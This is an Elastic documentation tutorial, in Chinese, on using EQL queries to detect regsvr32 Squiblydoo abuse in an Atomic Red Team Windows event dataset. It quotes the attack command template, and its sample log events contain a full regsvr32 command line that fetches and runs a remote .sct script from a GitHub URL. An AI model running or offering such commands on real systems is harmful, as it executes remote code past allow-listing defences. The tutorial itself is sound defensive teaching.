示例:使用 EQL 检测威胁
Elastic Stack Serverless
本示例教程展示了如何使用 EQL 检测安全威胁和其他可疑行为。 在此场景中,您的任务是检测 Windows 事件日志中的 regsvr32 滥用。
regsvr32.exe 是一个内置的命令行实用程序,用于在 Windows 中注册 .dll 库。 作为本机工具,regsvr32.exe 具有可信状态,使其可以绕过大多数允许列表软件和脚本阻止程序。 攻击者如果可以访问用户的命令行,则可以使用 regsvr32.exe 通过 .dll 库运行恶意脚本,即使在其他情况下禁止此类脚本的计算机上也是如此。
regsvr32 滥用的一种常见变体是 Squiblydoo 攻击。 在 Squiblydoo 攻击中,regsvr32.exe 命令使用 scrobj.dll 库来注册和运行远程脚本。 这些命令通常如下所示
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
本教程使用来自 Atomic Red Team 的测试数据集,其中包含模仿 Squiblydoo 攻击的事件。 数据已映射到 Elastic Common Schema (ECS) 字段。
开始操作
-
PUT /_index_template/my-data-stream-template{ "index_patterns": [ "my-data-stream*" ], "data_stream": { }, "priority": 500 } 使用 bulk API 将数据索引到匹配的流中
curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"使用 cat indices API 验证数据是否已编制索引
GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count响应应显示
docs.count为150。health status index docs.count yellow open .ds-my-data-stream-2099.12.07-000001 150
首先,获取与 regsvr32.exe 进程关联的事件的计数
GET /my-data-stream/_eql/search?filter_path=-hits.events <1> {
"query": """
any where process.name == "regsvr32.exe"
""",
"size": 200
}
?filter_path=-hits.events从响应中排除hits.events属性。 此搜索仅用于获取事件计数,而不是匹配事件的列表。- 匹配
process.name为regsvr32.exe的任何事件。 - 为匹配的事件返回最多 200 个命中。
响应返回 143 个相关事件。
{
"is_partial": false,
"is_running": false,
"took": 60,
"timed_out": false,
"hits": {
"total": {
"value": 143,
"relation": "eq"
}
}
}
regsvr32.exe 进程与 143 个事件相关联。 但是,regsvr32.exe 最初是如何调用的? 谁调用的? regsvr32.exe 是一个命令行实用程序。 将您的结果缩小到使用命令行的进程
GET /my-data-stream/_eql/search {
"query": """
process where process.name == "regsvr32.exe" and process.command_line.keyword != null
"""
}
查询匹配一个 event.type 为 creation 的事件,指示 regsvr32.exe 进程的开始。 根据事件的 process.command_line 值,regsvr32.exe 使用 scrobj.dll 来注册脚本 RegSvr32.sct。 这符合 Squiblydoo 攻击的行为。
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
}
]
}
}
检查 regsvr32.exe 稍后是否加载 scrobj.dll 库
GET /my-data-stream/_eql/search {
"query": """
library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
"""
}
查询匹配一个事件,确认已加载 scrobj.dll。
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
}
]
}
}
在许多情况下,攻击者使用恶意脚本连接到远程服务器或下载其他文件。 使用 EQL 序列查询 来检查以下一系列事件
- 一个
regsvr32.exe进程 - 同一进程加载
scrobj.dll库 - 同一进程的任何网络事件
根据先前响应中看到的命令行值,您可以期望找到匹配项。 但是,此查询并非专为该特定命令而设计。 相反,它寻找一种足够通用的可疑行为模式,以检测类似的威胁。
GET /my-data-stream/_eql/search {
"query": """
sequence by process.pid
[process where process.name == "regsvr32.exe"]
[library where dll.name == "scrobj.dll"]
[network where true]
"""
}
查询匹配一个序列,表明攻击可能已成功。
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"sequences": [
{
"join_keys": [
2012
],
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "EF5MJXMBMk1dGnErnBa9",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573238680000,
"destination": {
"address": "151.101.48.133",
"port": "443"
},
"source": {
"address": "192.168.162.134",
"port": "50505"
},
"event": {
"category": "network"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
},
"network": {
"protocol": "tcp",
"direction": "outbound"
}
}
}
]
}
]
}
}